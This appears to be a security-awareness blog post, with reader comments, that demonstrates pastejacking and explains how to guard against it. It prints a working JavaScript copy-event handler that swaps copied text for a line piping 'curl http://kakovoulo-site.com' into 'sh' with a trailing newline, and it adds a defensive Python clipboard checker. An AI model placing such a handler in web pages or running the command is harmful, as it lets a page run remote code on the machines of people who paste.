An unusual hacking demonstration will make you think twice before copying or pasting any text.
This is why you should NEVER copy and paste commands directly into your terminal. Ask any developer or administrator whether they have ever copied a command line or code snippet from the web. The answer will probably be YES. You assume that what you copied is what you paste, right? Well, no!
You think you are copying one thing, but it is being replaced by something else, such as malicious code. A single line of code inserted into what you copied is enough to create a backdoor in your application.
This attack is very simple but can cause great damage. Let's see how it works in practice:
Thanks to Harel Friedlander for recording this video.
Suppose you are looking for how to update your Ubuntu system and find the following command. Try it: copy the command below and paste it.
$ sudo apt update
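Here is the JavaScript that runs the exploit.
// Intercept the copy event on the element that displays the command.
document.getElementById('copyme').addEventListener('copy', function(e) {
  // Put different text on the clipboard; the trailing \n makes the shell run it on paste.
  e.clipboardData.setData('text/plain',
    'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
  );
  // Cancel the default copy so the selected text never reaches the clipboard.
  e.preventDefault();
});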
How can I protect myself?
The safest way is to paste nothing from the web into your terminal. Another option is to type "#" before pasting: this turns the command into a comment, so it is not executed, and you can see what you pasted before your terminal runs anything. You can, of course, also paste the command into a text file before putting it in your terminal.
Also, many terminals can be configured not to run a command automatically when the pasted text contains a "\n" (newline).
The above was just one example of why raising awareness is necessary to avoid intrusions. There are many examples of truly malicious scripts circulating on the internet.
The other alternative, of course, is to use an intermediate destination (e.g. a text editor), which will show what you really have in your clipboard.
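The "look at what is really in your clipboard first" advice above, as an added example that is not code from the original article: it renders hidden characters and flags the traits of the demo payload before anything reaches the shell. The function names, the regex heuristic and the `xclip` usage in the comment are assumptions of this example.

```python
import re
import sys

# Heuristic for "download and run" pipelines; an assumption of this example.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")

# The replacement text set by the page's copy handler (what really gets pasted).
SAMPLE = 'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'


def visible(text):
    """Render newlines and control characters so nothing stays hidden."""
    out = []
    for ch in text:
        if ch == "\n":
            out.append("\\n")
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def inspect_paste(clipboard, expected=None):
    """Return findings for text that is about to be pasted into a shell."""
    findings = []
    if expected is not None and clipboard.strip() != expected.strip():
        findings.append("mismatch")  # clipboard is not what was on screen
    if "\n" in clipboard or "\r" in clipboard:
        findings.append("newline")  # would run without pressing Enter
    if any((ord(c) < 0x20 and c not in "\n\r\t") or ord(c) == 0x7F
           for c in clipboard):
        findings.append("control-char")
    if PIPE_TO_SHELL.search(clipboard):
        findings.append("pipe-to-shell")
    return findings


if __name__ == "__main__":
    # Usage: pipe the clipboard in, e.g. `xclip -o -selection clipboard | ...`
    text = sys.stdin.read()
    problems = inspect_paste(text)
    print(visible(text))
    print("findings:", ", ".join(problems) or "none")
    sys.exit(1 if problems else 0)
```

The script exits non-zero when anything is flagged, so it can gate a paste helper or shell alias.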
A humble thank you!
Good evening, Happy Birthday and Happy New Year!!
I would like to thank you first for your informative articles.
Another solution that solves the above problem works in Firefox: about:config >> dom.event.clipboardevents.enabled >> false.
A friend of the most customizable browser in the world.
happy new year, thank you for adding